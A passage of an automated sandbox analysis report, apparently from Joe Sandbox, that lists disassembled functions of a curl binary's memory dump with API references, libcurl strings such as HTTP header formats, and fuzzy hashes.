Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: _stricmpcurl_strequalfgetsfopen
String ID: Set-Cookie:$none
API String ID: 1609596366-3629594122
Opcode ID: 0af6e36be145516f41ae21fbf35f26d7a64293810b6c4823aa206bfb2f32aed8
Instruction ID: 69a776b8db3cb177399e78d979b8247ab5020b951761a88c3dcf8f9b393ec0b7
Opcode Fuzzy Hash: 0af6e36be145516f41ae21fbf35f26d7a64293810b6c4823aa206bfb2f32aed8
Instruction Fuzzy Hash: 54419DB0608325AFD320AF21E64432BBBE5AF84344F85491FE88587351D7BDD988CB5B

Function 00418600 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0041863E
strchr.MSVCRT ref: 00418654

Strings

:, xrefs: 00418647
., xrefs: 0041869A

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strchrstrlen
String ID: .$:
API String ID: 986617436-4202072812
Opcode ID: f024780256012edcf7699edcb7412cb212c52c2250dfb33ad50227d5de077c15
Instruction ID: 882b04047778f93e61b20299acd0fb6b81d66eec26e1c7cd6816c397d810941b
Opcode Fuzzy Hash: f024780256012edcf7699edcb7412cb212c52c2250dfb33ad50227d5de077c15
Instruction Fuzzy Hash: B43173B5A083424BD710EF75D5802AFBBD1ABC0754F15882FE88487341EB79D8C58B9B

Function 00402000 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004020D2
curl_msnprintf.CURL ref: 004020F7

Part of subcall function 0040F070: curl_mvsnprintf.CURL ref: 0040F092

curl_mfprintf.CURL ref: 00402118
fflush.MSVCRT ref: 00402123
curl_mfprintf.CURL ref: 004021EE

Strings

%%-%ds %%5.1f%%%%, xrefs: 004020E4
(, xrefs: 004020EC

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_mfprintf$curl_msnprintfcurl_mvsnprintffflushmemset
String ID: %%-%ds %%5.1f%%%%$(
API String ID: 2208137222-2243520151
Opcode ID: 5c5ad875bf8bb92bf7dab7857edadbbf9aea5ef4cc2f799ce72a507d37665eeb
Instruction ID: 4b0b6c91784d7bdae60e5dbccc5ad9a357744da5b6ef0d1e446027d8fc6525d3
Opcode Fuzzy Hash: 5c5ad875bf8bb92bf7dab7857edadbbf9aea5ef4cc2f799ce72a507d37665eeb
Instruction Fuzzy Hash: 6A41EF74A083049BCB00DF16C58428EBBF1FFC9758F118A2EF988A7351E379D9458B86

Function 00427940 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00413750: gmtime.MSVCRT ref: 0041375F

curl_msnprintf.CURL ref: 004279DE

Part of subcall function 0040F070: curl_mvsnprintf.CURL ref: 0040F092

Part of subcall function 00427580: curl_mvaprintf.CURL ref: 00427598
Part of subcall function 00427580: strlen.MSVCRT ref: 004275A6

Strings

%s, %02d %s %4d %02d:%02d:%02d GMT, xrefs: 0042797A
If-Modified-Since: %s, xrefs: 004279FE
Invalid TIMEVALUE, xrefs: 00427A57
If-Unmodified-Since: %s, xrefs: 00427A3C
Last-Modified: %s, xrefs: 00427A1D

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintfcurl_mvaprintfcurl_mvsnprintfgmtimestrlen
String ID: %s, %02d %s %4d %02d:%02d:%02d GMT$If-Modified-Since: %s$If-Unmodified-Since: %s$Invalid TIMEVALUE$Last-Modified: %s
API String ID: 2866288605-2575227759
Opcode ID: 817ca80ecc59c663f958806600f0ffabe3710d6d0d3d0435f5ac14fca7af679d
Instruction ID: da90a409817455bdd65259026b6f05e43b6358bce7c375b8ab027c1d9f32ffa2
Opcode Fuzzy Hash: 817ca80ecc59c663f958806600f0ffabe3710d6d0d3d0435f5ac14fca7af679d
Instruction Fuzzy Hash: F731F3B9A097019FC710DF19E58555AFBE0FFC8718F00892EE98887311E379D9598B86

Function 00436FB0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 81stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00437349

Part of subcall function 004166C0: curl_mvsnprintf.CURL(?,?,?,?,?,?,?,?,0041AB91), ref: 004166EA
Part of subcall function 004166C0: strlen.MSVCRT ref: 00416710

sscanf.MSVCRT ref: 004375FF

Strings

Mailbox UIDVALIDITY has changed, xrefs: 004376A6
*, xrefs: 00436FB2
O, xrefs: 00436FC1
Select failed, xrefs: 00436FCA
OK [UIDVALIDITY %19[0123456789]], xrefs: 004375F4

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_mvsnprintfsscanfstrcmpstrlen
String ID: *$Mailbox UIDVALIDITY has changed$O$OK [UIDVALIDITY %19[0123456789]]$Select failed
API String ID: 806659881-1642768266
Opcode ID: 1ed0366bf20620eb465c21620f050c97d2a26d549c94a4d9c50de2ba4526d9db
Instruction ID: 6b5a42b83fb2d5bc2bb7228b859439046254ccfcafb863452706ba207bdc2408
Opcode Fuzzy Hash: 1ed0366bf20620eb465c21620f050c97d2a26d549c94a4d9c50de2ba4526d9db
Instruction Fuzzy Hash: 28313AB0608701AFC714AF25C48066AB7E0EB88345F15A83FE9898B341E739D8459F5A

Function 00421870 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 72COMMON

Download Yara Rule

APIs

curl_maprintf.CURL ref: 00421954

Strings

#HttpOnly_, xrefs: 00421902
unknown, xrefs: 004218CD, 004218EC
%s%s%s%s%s%s%I64d%s%s, xrefs: 00421941
TRUE, xrefs: 00421871, 004218C8
FALSE, xrefs: 004218AE, 004218E7

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_maprintf
String ID: #HttpOnly_$%s%s%s%s%s%s%I64d%s%s$FALSE$TRUE$unknown
API String ID: 3307269620-3622669638
Opcode ID: 738757a0881afde0894ee39644f04e529c0b76ea99bf96bb6d372c13aa9e41ca
Instruction ID: c527417cd060c2460546e8c76e3cbe48c3d298fb7716c72d7a6a695d8b764735
Opcode Fuzzy Hash: 738757a0881afde0894ee39644f04e529c0b76ea99bf96bb6d372c13aa9e41ca
Instruction Fuzzy Hash: 0D2136B4A097009F8744CF1A948094AFBE6BFC9354F95C86EE888A7324E374DC518F4B

Function 00426660 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 69stringCOMMON

Download Yara Rule

APIs

curl_msnprintf.CURL ref: 004266B6
strlen.MSVCRT ref: 004266BE
curl_maprintf.CURL ref: 00426728

Strings

%s:%s, xrefs: 004266A3
%sAuthorization: Basic %s, xrefs: 00426721
Proxy-, xrefs: 00426711

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_maprintfcurl_msnprintfstrlen
String ID: %s:%s$%sAuthorization: Basic %s$Proxy-
API String ID: 1394312012-2961970465
Opcode ID: d87b829e7c02b5df75faaec96b8c6b0ca36f971ad2e8dedb582a92debcb57142
Instruction ID: b32a2db7bc672fda1bdad5928d09f1c5c1be1f4428092ca89d51b071b215aece
Opcode Fuzzy Hash: d87b829e7c02b5df75faaec96b8c6b0ca36f971ad2e8dedb582a92debcb57142
Instruction Fuzzy Hash: EA21F2B46087018FC710DF29D48469ABBE1EFC8349F16896EE89897325E7389945CF4A

Function 004070D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64stringCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32 ref: 004070F5
strchr.MSVCRT ref: 0040711B
ExpandEnvironmentStringsA.KERNEL32 ref: 00407139
_strdup.MSVCRT ref: 0040715C

Strings

%, xrefs: 00407180

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: Environment$ExpandStringsVariable_strdupstrchr
String ID: %
API String ID: 3325462801-2567322570
Opcode ID: 9b8785dd1830b058cff3efb809c868adb070d6b8006acffc2b79202bfd8b37e4
Instruction ID: 0e21e9f8057e94e3e5fbc50e17d6d0b9ab4767cc24bf23de4cbab6603609c31b
Opcode Fuzzy Hash: 9b8785dd1830b058cff3efb809c868adb070d6b8006acffc2b79202bfd8b37e4
Instruction Fuzzy Hash: E0118471D083049ADB10AF69988426EBBE4EF84355F00847ED94897390E7799949879B

Function 004045E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 0040460B
free.MSVCRT ref: 00404622
_strdup.MSVCRT ref: 00404638
free.MSVCRT ref: 004051B2
_strdup.MSVCRT ref: 004051D7

Strings

=, xrefs: 00404600

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: _strdupfree$strchr
String ID: =
API String ID: 1739957132-2322244508
Opcode ID: a7bdf5e06aded97d50d378a52371e4dba00a299d06c8c7ce55e7116a12787aa0
Instruction ID: f16202f9ccc67e3dd0118a8847915d8528cd3f708c092d4ff59255b68d9dd796
Opcode Fuzzy Hash: a7bdf5e06aded97d50d378a52371e4dba00a299d06c8c7ce55e7116a12787aa0
Instruction Fuzzy Hash: 5D21E5B47083419BEB209F25C58476B77E4AFD2309F04092EEAD4AB391E77CD8418B5B

Function 0042674C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 56stringCOMMON

Download Yara Rule

APIs

curl_msnprintf.CURL ref: 004266B6

Part of subcall function 0040F070: curl_mvsnprintf.CURL ref: 0040F092

strlen.MSVCRT ref: 004266BE

Part of subcall function 00443440: curl_msnprintf.CURL ref: 0044355B
Part of subcall function 00443440: strlen.MSVCRT ref: 00443581

curl_maprintf.CURL ref: 00426728

Strings

%s:%s, xrefs: 004266A3
%sAuthorization: Basic %s, xrefs: 00426721
Proxy-, xrefs: 00426711

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintfstrlen$curl_maprintfcurl_mvsnprintf
String ID: %s:%s$%sAuthorization: Basic %s$Proxy-
API String ID: 3834447052-2961970465
Opcode ID: b6d94e08391c11402b8dfc7a4cf3f1b746a4afb81550555979809cd4f483be61
Instruction ID: 71df10395505c1b779170f97eb49f42fb55b074108455e8da92f22a29d5414f7
Opcode Fuzzy Hash: b6d94e08391c11402b8dfc7a4cf3f1b746a4afb81550555979809cd4f483be61
Instruction Fuzzy Hash: 7821DEB56087018FC710DF29D48469AFBE0AF88309F11C92EE8D997311E738D9858F4A

Function 0043077C Relevance: 10.5, APIs: 3, Strings: 4, Instructions: 44stringnetworkCOMMON

Download Yara Rule

APIs

strncpy.MSVCRT ref: 0043057F
sscanf.MSVCRT ref: 004305BB
strncpy.MSVCRT ref: 00430610
FreeLibrary.KERNEL32 ref: 00430671
sscanf.MSVCRT ref: 004307A5
WSAStartup.WS2_32 ref: 004307D3
curl_slist_free_all.CURL ref: 00430860

Strings

TTYPE, xrefs: 004305C9
%127[^= ]%*[ =]%255s, xrefs: 004305AE
XDISPLOC, xrefs: 004305DD
%hu%*[xX]%hu, xrefs: 00430786

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: sscanfstrncpy$FreeLibraryStartupcurl_slist_free_all
String ID: %127[^= ]%*[ =]%255s$%hu%*[xX]%hu$TTYPE$XDISPLOC
API String ID: 125201174-251003106
Opcode ID: a2735e5da14ba0e42c94d1a26e73be3f0d44c339aea15b11b41cffddd6a79c0c
Instruction ID: 4c0fab34ef6e7dfddbe1443d09752b057d7e5272963f60c47c9bcf993ea7ba3f
Opcode Fuzzy Hash: a2735e5da14ba0e42c94d1a26e73be3f0d44c339aea15b11b41cffddd6a79c0c
Instruction Fuzzy Hash: 39111C70909704AFD720DF25C5942ABBBE0AF89304F00D95ED4C987311E778D889CF46

Function 00417E90 Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 224stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 00417EB6
strchr.MSVCRT ref: 00417EDD
memcpy.MSVCRT ref: 00417F93
memcpy.MSVCRT ref: 00417FDB
memcpy.MSVCRT ref: 0041801D

Strings

;, xrefs: 00417ED2

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: memcpy$strchr
String ID: ;
API String ID: 921174694-1661535913
Opcode ID: ffe79272e0c2e5b393122450f643e6b2faceafdd2565a33f5fc996947b773d74
Instruction ID: eb7635140f2b3918322d789a592dbc5f6fd23e6d43995efd39a74e237a539192
Opcode Fuzzy Hash: ffe79272e0c2e5b393122450f643e6b2faceafdd2565a33f5fc996947b773d74
Instruction Fuzzy Hash: 10815E702083058FD710DF69C48466BBBE1BF88784F15892EF885C7354EB79D98ACB4A

Function 00443AE0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 223COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00443B95
memcpy.MSVCRT ref: 00443CEF

Strings

8, xrefs: 00443C26
/, xrefs: 00443C42
1.2.0.4, xrefs: 00443C09
1.2.8, xrefs: 00443C2E

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: memcpy
String ID: /$1.2.0.4$1.2.8$8
API String ID: 3510742995-729108957
Opcode ID: e4854e82a9f49f60f58a93909e7b0206cdbadefa96da0c6cfb71a8b1e7fb6c70
Instruction ID: e82f36c33c3c8570409a309d8c8cad498c85bd081f6525a751884ca6420dfa76
Opcode Fuzzy Hash: e4854e82a9f49f60f58a93909e7b0206cdbadefa96da0c6cfb71a8b1e7fb6c70
Instruction Fuzzy Hash: 42914CB06043018FEB10DF29C48575ABBE1FF85B06F18847AED888B357D739D9458B5A

Function 0042E311 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 199COMMON

Download Yara Rule

Strings

Getting file with size: %I64d, xrefs: 0042EDB4
bytes, xrefs: 0042F2B6
Data conn was not available immediately, xrefs: 0042E3F6
RETR response: %03d, xrefs: 0042EFA0
Maxdownload = %I64d, xrefs: 0042E39C, 0042ED7B, 0042F125

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID:
String ID: bytes$Data conn was not available immediately$Getting file with size: %I64d$Maxdownload = %I64d$RETR response: %03d
API String ID: 0-3434952757
Opcode ID: 5c36b26931aa20492b06673b4a6d641c1312137bfa60c8e8a2c5376934a2b7a9
Instruction ID: 849526019402f67a83099e81475c196de85375be1ec15e34970854caa637a18d
Opcode Fuzzy Hash: 5c36b26931aa20492b06673b4a6d641c1312137bfa60c8e8a2c5376934a2b7a9
Instruction Fuzzy Hash: DA813C707093249FD714DF2AD08466AB7E1BF84304F94896FE8998B352D738E8458F4A

Function 00446CE8 Relevance: 9.1, APIs: 6, Instructions: 106COMMON

Download Yara Rule

APIs

isprint.MSVCRT ref: 00446E67
islower.MSVCRT ref: 00446EB0
islower.MSVCRT ref: 00446EC6
isupper.MSVCRT ref: 00446EF6
isupper.MSVCRT ref: 00446F08

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: islowerisupper$isprint
String ID:
API String ID: 1066444217-0
Opcode ID: 7a7c507de36433c280c402e2abd556e029dc994d6a87b464c88594b4be90416f
Instruction ID: 8df8d963c8dbde8ce2da406cde91240560eb17612559bf149c3b118d32b72126
Opcode Fuzzy Hash: 7a7c507de36433c280c402e2abd556e029dc994d6a87b464c88594b4be90416f
Instruction Fuzzy Hash: D541707110C7528BE7118F25D48426FBBE2AB96300F1A895FE4D887351D339D889DB9B

Function 0040BED0 Relevance: 9.1, APIs: 6, Instructions: 90COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 0040BF03
fread.MSVCRT ref: 0040BF28
free.MSVCRT ref: 0040BF49

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
